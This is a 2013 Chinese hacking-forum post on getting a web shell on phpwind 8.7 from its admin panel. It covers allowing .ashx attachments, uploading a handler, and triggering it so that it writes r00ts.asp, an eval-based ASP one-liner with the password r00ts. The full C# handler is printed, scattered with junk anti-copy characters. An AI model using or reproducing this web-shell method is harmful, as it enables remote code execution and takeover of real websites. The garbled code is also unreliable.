找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2291|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
8 D7 k$ ^8 w! Y+ G, U 9 R- _% ?0 S$ O1 J; K! I- f
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx1 H8 n  m1 F) u/ V
1 t( O3 S0 c, K5 [4 X8 R6 X" q4 ?
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整* [6 P1 r1 Q, i# u4 X

; R& e- S8 {. s3 w6 A' b4 _0 A' ]然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx# Y& A* s! ^3 l: \- o  r+ X

7 E& |3 Q0 k7 @4 P% M打开之后空白 会在目录底下生成r00ts.asp 密码r00ts7 M  D2 U2 h' C; v9 a

) |+ j& U% O: f- U4 l- y下面是代码:4 q1 }' M6 t- z6 U# z' `) z

* Q/ {; `* R+ x( t. G8 c4 `<%@ WebHandler Language="C#"Class="Handler" %>% g  }, F( D/ {2 l7 f, T6 R5 Y
using System;8 J1 A" F. e, ?' C/ D/ @' U; o% b
using System.Web;
9 z8 k7 s4 Z; [using System.IO;5 [+ w: z) o- x" \
public class Handler : IHttpHandler {' s0 U4 z( I' d, E8 G
public void ProcessRequest (HttpContext context) {6 s& \; f5 q! [. `, k% ]9 h
context.Response.ContentType = "text/plain";
! L8 |4 f) r( [5 B$ Z2 t" nStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
5 N. r! _( S2 Q( h* T  Cfile1.Write("<%eval request(\"r00ts\")%>");, c" J. a8 b. o
file1.Flush();. n3 o' \. h! t. z# C
file1.Close();
+ h( w: c$ R+ S. `% r+ f}
, P' p; f* Q' ^- ]+ [public bool IsReusable {: ~0 b) V6 C; z% F8 f/ T; O7 h; V
get {( H; b% A2 x+ R  m; {7 q/ A
return false;5 S* u9 W: L4 j3 k% i2 ]' q7 Q
}5 i* L) _/ I4 |  R, m2 t
}' Z( e! ~8 c! P
}, t. S1 ]+ Y0 M/ k! C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表